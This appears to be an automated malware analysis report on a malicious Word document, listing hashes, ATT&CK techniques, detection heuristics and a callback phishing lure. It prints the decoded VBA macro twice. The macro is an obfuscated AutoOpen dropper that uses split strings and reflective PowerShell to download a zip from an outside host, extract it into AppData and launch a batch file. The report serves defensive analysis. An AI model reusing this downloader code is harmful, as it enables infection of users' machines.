Office (OLE) malware analysis — malicious · 08792e071b69c7f3

MALICIOUS

Office (OLE)

3.29 MB Created: 2018-05-07 16:38:00 Authoring application: Microsoft Office Word First seen: 2018-06-30

MD5: a90b393d1e2565f6843b0e822783620b SHA-1: 10853ceb79206002d627766ff93169e1f4a50f5f SHA-256: 08792e071b69c7f3db6e8ae601ac5bca598397d715607adf549d7fff836b7044

350 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros with an AutoOpen function that executes a PowerShell command. This command is obfuscated but reconstructs to download a file from 'https://updates.mail-dib.ae/updates.zip' and save it as 'updates.zip' in the user's profile directory. The document body also presents a callback phishing lure, asking the user to contact a sales support specialist via phone or email, which is likely a pretext to delay detection while the malicious script executes. The presence of WMI process creation and split string obfuscation further indicates malicious intent.

Heuristics 10

ClamAV: Doc.Dropper.Donoff-5743532-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Donoff-5743532-0
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Callback phishing phone lure medium SE_CALLBACK_LURE

Document asks the user to call a phone number in billing, refund, subscription, fraud, or security context — consistent with callback phishing or tech-support scam patterns. Suppressed for legitimate-issuer (IRS/gov/official-form) documents that carry no urgency or charge/dispute escalation.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://updates.mail-dib.ae/updates.zip In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5367 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5367 bytes
SHA-256: `0004350aa7375233e04ef1770ad5de3632ea3ee96dad3574b559d58f23ffdb24`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" #If VBA7 Then Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr) #Else Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) #End If Sub AutoOpen() Debugging color End Sub Public Function Debugging() As Variant Dim Str As String Str = "p" & "ow" & "er" & "s" & "h" & "el" & "l.exe Set-Vari" & "able X" & "R 'Net.WebClient';" Str = Str & "SI Var" & "iab" & "le:\Xb9 '" & Environ("USERPROFILE") & "\updates.zip';SI Va" & "ria" & "b" & "le:K 'https://updates.mail-dib.ae/updates.zip';" Str = Str & "dir ect;Set-Va" & "ria" & "ble 8J2 (.$Exec" & "utionC" & "ontext.(($Executi" & "onCon" & "text\|GM)[6].Na" & "me).(($Execu" & "tionCo" & "ntext.(($Exec" & "utionCon" & "text\|GM)[6].Name)\|GM)[2].Name).Inv" & "oke($Execution" & "Context.(($Exec" & "ution" & "Context\|GM)[6].Name).(($Ex" & "ecutionContext.(($ExecutionContext\|GM)[6].Name).PsObject.Methods\|Where{$_.Name-ilike'nde'}).Name).Invoke('N-O',1,1))(GV XR -Value));SV X ((((GV 8J2 -ValueO)\|GM)\|Where{$_.Name-ilike'Doe'}).Name);(GV 8J2 -ValueO).((Variable X).Value).Invoke((GV K).Value,(GI Variable:/Xb9).Value);.$ExecutionContext.(($ExecutionContext\|GM)[6].Name).(($ExecutionContext.(($ExecutionContext\|GM)[6].Name)\|GM)[2].Name).Invoke($ExecutionContext.(($ExecutionContext\|GM)[6].Name).(($ExecutionContext.(($ExecutionContext\|GM)[6].Name).PsObject.Methods\|Where{$_.Name-ilike'nde'}).Name).Invoke('ke-pr*',$TRUE,1))([System.String]::Join('',(([IO.File]::ReadAllBytes((GI Variable:/Xb9).Value)\|ForEach-Object{(Get-Variable _ -Valu)-As'Char'}))));" Strr = "p" & "ow" & "er" & "sh" & "el" & "l.ex" & "e if ($PS" & "Vers" & "ion" & "Ta" & "ble.P" & "SVers" & "ion.Ma" & "jor -gt 2" & "){ p" & "owe" & "rshe" & "l" & "l." & "ex" & "e -nolo" & "go -no" & "pr" & "ofi" & "le -co" & "mma" & "nd "" { Add-Ty" & "pe -A 'Syst" & "em.IO.Compr" & "essi" & "on.Fi" & "leSyst" & "em'; [IO.Comp" & "ressio" & "n.Zip" & "Fi" & "le" & "]::Ext" & "ra" & "ctTo" & "Dir" & "ec" & "to" & "ry('" & Environ("USERPROFILE") & "\up" & "da" & "tes.zip', '" & Environ("USERPROFILE") & "\AppData\Roaming\Microsoft\Windows\updates'); }"";}" Strr = Strr & "el" & "se{po" & "we" & "r" & "s" & "h" & "el" & "l.ex" & "e -c" & "om" & "ma" & "nd ""{fun" & "ct" & "io" & "n Exp" & "an" & "dZI" & "PFi" & "le($fi" & "le, $des" & "tin" & "atio" & "n){$s" & "he" & "ll =" & " new-" & "object -com sh" & "el" & "l.a" & "pp" & "lic" & "at" & "i" & "on;$zi" & "p = $sh" & "e" & "ll.Nam" & "eSp" & "ac" & "e($fi" & "le);fo" & "r" & "e" & "ac" & "h(" & "$it" & "em in $zi" & "p.it" & "em" & "s())" & "{$s" & "he" & "ll.N" & "am" & "es" & "pace(" & "$d" & "est" & "in" & "ati" & "on).co" & "pyhe" & "re($it" & "em);}};E" & "xpa" & "ndZ" & "ip" & "Fil" & "e " & Environ("USERPROFILE") & "\up" & "da" & "t" & "es.zi" & "p " & Environ("USERPROFILE") & "\A" & "ppData\Roami" & "ng\Microsoft\Windows\}}""" Str3 = "p" & "ow" & "er" & "sh" & "el" & "l.e" & "xe if ($PS" & "Vers" & "io" & "nT" & "a" & "ble.P" & "SV" & "er" & "sio" & "n.Ma" & "jor " & "-gt 2){ po" & "we" & "rs" & "h" & "ell.e" & "xe co" & "py " & Environ("USERPROFILE") & "\AppData\Roaming\Microsoft\Wind" & "ows\upda" & "tes\Win" & "dows_upd" & "ates.tx" & "t " & Environ("USERPROFILE") & "\Windows_updates.cr" & "t;}else{po" & "wer" & "sh" & "el" & "l.e" & "xe co" & "py " & Environ("USERPROFILE") & "\AppData\Roaming\Microsoft\Windows\Wi" & "ndows_u" & "pdates.t" & "xt " & Environ("USERPROFILE") & "\Window" & "s_updates.cr" & "t;}" Str4 = "p" & "ow" & "er" & "sh" & "e" & "ll.e" & "xe if ($P" & "SVer" & "si" & "onT" & "ab" & "le.PS" & "Ver" & "sio" & "n.Ma" & "jor -gt 2){ p" & "ower" & "sh" & "e" & "l" & "l.e" & "xe " & Environ("USERPROFILE") & "\AppData\Roaming\Microsoft\Wind" & "ows\upda" & "tes\Windows_updates.bat;}else{po" ... (truncated)

SHA-256: 0004350aa7375233e04ef1770ad5de3632ea3ee96dad3574b559d58f23ffdb24

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
#If VBA7 Then
    Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
#Else
    Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If
Sub AutoOpen()
Debugging
color
End Sub




Public Function Debugging() As Variant
Dim Str As String
Str = "p" & "ow" & "er" & "s" & "h" & "el" & "l.exe Set-Vari" & "able X" & "R 'Net.WebClient';"
Str = Str & "SI Var" & "iab" & "le:\Xb9 '" & Environ("USERPROFILE") & "\updates.zip';SI Va" & "ria" & "b" & "le:K 'https://updates.mail-dib.ae/updates.zip';"
Str = Str & "dir ect*;Set-Va" & "ria" & "ble 8J2 (.$Exec" & "utionC" & "ontext.(($Executi" & "onCon" & "text|GM)[6].Na" & "me).(($Execu" & "tionCo" & "ntext.(($Exec" & "utionCon" & "text|GM)[6].Name)|GM)[2].Name).Inv" & "oke($Execution" & "Context.(($Exec" & "ution" & "Context|GM)[6].Name).(($Ex" & "ecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where{$_.Name-ilike'*nd*e'}).Name).Invoke('N*-O*',1,1))(GV XR -Value));SV X ((((GV 8J2 -ValueO)|GM)|Where{$_.Name-ilike'Do*e'}).Name);(GV 8J2 -ValueO).((Variable X).Value).Invoke((GV K).Value,(GI Variable:/Xb9).Value);.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM)[2].Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where{$_.Name-ilike'*nd*e'}).Name).Invoke('*ke-*pr*',$TRUE,1))([System.String]::Join('',(([IO.File]::ReadAllBytes((GI Variable:/Xb9).Value)|ForEach-Object{(Get-Variable _ -Valu)-As'Char'}))));"
Strr = "p" & "ow" & "er" & "sh" & "el" & "l.ex" & "e  if ($PS" & "Vers" & "ion" & "Ta" & "ble.P" & "SVers" & "ion.Ma" & "jor -gt 2" & "){ p" & "owe" & "rshe" & "l" & "l." & "ex" & "e -nolo" & "go -no" & "pr" & "ofi" & "le -co" & "mma" & "nd "" { Add-Ty" & "pe -A 'Syst" & "em.IO.Compr" & "essi" & "on.Fi" & "leSyst" & "em'; [IO.Comp" & "ressio" & "n.Zip" & "Fi" & "le" & "]::Ext" & "ra" & "ctTo" & "Dir" & "ec" & "to" & "ry('" & Environ("USERPROFILE") & "\up" & "da" & "tes.zip', '" & Environ("USERPROFILE") & "\AppData\Roaming\Microsoft\Windows\updates'); }"";}"
Strr = Strr & "el" & "se{po" & "we" & "r" & "s" & "h" & "el" & "l.ex" & "e -c" & "om" & "ma" & "nd ""{fun" & "ct" & "io" & "n Exp" & "an" & "dZI" & "PFi" & "le($fi" & "le, $des" & "tin" & "atio" & "n){$s" & "he" & "ll =" & " new-" & "object -com sh" & "el" & "l.a" & "pp" & "lic" & "at" & "i" & "on;$zi" & "p = $sh" & "e" & "ll.Nam" & "eSp" & "ac" & "e($fi" & "le);fo" & "r" & "e" & "ac" & "h(" & "$it" & "em in $zi" & "p.it" & "em" & "s())" & "{$s" & "he" & "ll.N" & "am" & "es" & "pace(" & "$d" & "est" & "in" & "ati" & "on).co" & "pyhe" & "re($it" & "em);}};E" & "xpa" & "ndZ" & "ip" & "Fil" & "e " & Environ("USERPROFILE") & "\up" & "da" & "t" & "es.zi" & "p " & Environ("USERPROFILE") & "\A" & "ppData\Roami" & "ng\Microsoft\Windows\}}"""
Str3 = "p" & "ow" & "er" & "sh" & "el" & "l.e" & "xe if ($PS" & "Vers" & "io" & "nT" & "a" & "ble.P" & "SV" & "er" & "sio" & "n.Ma" & "jor " & "-gt 2){ po" & "we" & "rs" & "h" & "ell.e" & "xe co" & "py " & Environ("USERPROFILE") & "\AppData\Roaming\Microsoft\Wind" & "ows\upda" & "tes\Win" & "dows_upd" & "ates.tx" & "t " & Environ("USERPROFILE") & "\Windows_updates.cr" & "t;}else{po" & "wer" & "sh" & "el" & "l.e" & "xe co" & "py " & Environ("USERPROFILE") & "\AppData\Roaming\Microsoft\Windows\Wi" & "ndows_u" & "pdates.t" & "xt " & Environ("USERPROFILE") & "\Window" & "s_updates.cr" & "t;}"
Str4 = "p" & "ow" & "er" & "sh" & "e" & "ll.e" & "xe if ($P" & "SVer" & "si" & "onT" & "ab" & "le.PS" & "Ver" & "sio" & "n.Ma" & "jor -gt 2){ p" & "ower" & "sh" & "e" & "l" & "l.e" & "xe " & Environ("USERPROFILE") & "\AppData\Roaming\Microsoft\Wind" & "ows\upda" & "tes\Windows_updates.bat;}else{po"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.